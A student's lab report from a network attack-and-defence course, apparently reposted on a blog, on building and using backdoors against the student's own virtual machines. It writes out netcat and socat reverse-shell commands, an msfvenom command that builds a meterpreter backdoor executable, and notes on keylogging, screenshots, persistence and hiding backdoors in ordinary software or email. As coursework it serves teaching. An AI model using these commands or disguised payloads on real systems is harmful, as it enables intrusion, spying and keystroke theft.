• 20145335郝昊 《网络对抗》后门原理与实践


    20145335郝昊 《网络对抗》后门原理与实践

    实验内容

    • 使用netcat和socat获取靶机shell,并实现计划启动;Windows获取Linux的shell和Linux获取Windows的Shell

    • 使用msf-meterpreter生成可执行后门软件并发送给靶机shell,并进行一些命令操作,比如查看ip、查看电脑信息,截屏等功能。

    实验步骤与结果

    Linux获取Windows的Shell

    • 首先kali虚拟机和靶机都要有ncat,windows中需要下载并安装(注意:在运行的时把目录调整到ncat.exe下)

    • kali下使用ifconfig来获取虚拟机的ip

    • 在虚拟机使用 nc -l -p 5335将5335设置成监听端口。在windows下使用命令netcat.exe -e cmd 172.30.5.159 5335


    windows下获取Linux的Shell

    • windows下使用命令 netcat.exe 172.30.5.159 5335监听

    • kali下使用nc -e /bin/sh -l -p 5335反弹连接

    • 之后在windows下使用命令ifconfig命令进行验证

    ncat传输文件

    • windows使用命令 ncat.exe -lv 1453 > Hfile.exe

    • kali下使用命令ncat -nv 172.30.3.151 1453 <pwnx

    socat获取主机shell

    • windows利用socat获取kali的shell:

    • 在kali虚拟机上使用socat tcp-listen:5335

    • 同時用socat tcp-l:5335 system:bash,pty,stderr反弹连接

    • windows使用socat readline tcp:172.30.5.159 5335开启监听

    • 成功,使用ifconfig检测


    meterpreter后门程序

    • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=169.254.161.25 LPORT=208 -f exe >20145335.exe来生成后门程序,然后发送到windows机中。

    • 开启msf设置

    • meterpreter信息收集

    • 查看系统版本信息

    • 对靶机进行截图



    • 记录键盘输入

    • 后门程序启动


    实验遇到的问题

    • 第一在使用ifconfig命令查看kali的ip地址时候看错了地址,如下图

      应该是172.30.5.159,错看成了广播地址,172.30.7.255导致在做实验的时候遇到了问题

    • 在完成meterpreter后门实验的时候,生成了后门软件,但是在靶机中无法正常运行程序,双击之后程序没有任何反应。后来解决办法是右键,以管理员身份运行,就可以用任务管理器查看出后满软件是否在运行。

    实验思考

    • 如何将一个后台软件安装到系统中?

      第一可以将后天软件包装在一个正常的软件中,因为通过实验可以发现后门软件内存非常小,完全不会注意到其存在。

      第二可以将后天软件负载到邮件等传播文件中,这样就可以安装到系统中。

    • 后门软件如何启动

      在以上的实验过程中可以windows中可以使用任务启动计划,可以设置相应的条件,如开机时,休眠时,启动某项软件时;Linux中设置cron来完成。

    • meterpreter有哪些给你印象深刻的功能?

      第一,因为是第一次接触后门软件,截图功能给我留下了深刻印象。因为截图可以看到整个电脑屏幕的现状,从而不仅可以获得电脑信息,还可以分析出一个人用电脑的习惯,譬如喜欢全屏操作还是喜欢半屏操作等等。

      第二是键盘记录,在做实验中,我在靶机中没有打开任何软件,只是单纯的在桌面下敲击键盘,然而metrerpreter也能记录出敲击顺序。
      
    • 如何发现系统有后门软件

      如果发现自己的比较私密的信息会突然出现在不该出现的场合,或者电脑的cpu会猛增,都会可能是后门软件在后台执行。

  • 相关阅读:
    JS绑定种类汇总
    JS的块级作用域
    JS中的几种函数
    区分词法作用域(js)与动态作用域(精!)
    JS Dom节点操作demo!
    JS作用域相关知识(#精)
    js解析器(重要!)
    JS之鼠标在盒子中的位置
    JS之鼠标跟随
    JS之事件对象体验
  • 原文地址:https://www.cnblogs.com/20145335hh/p/6556931.html
Copyright © 2020-2023  润新知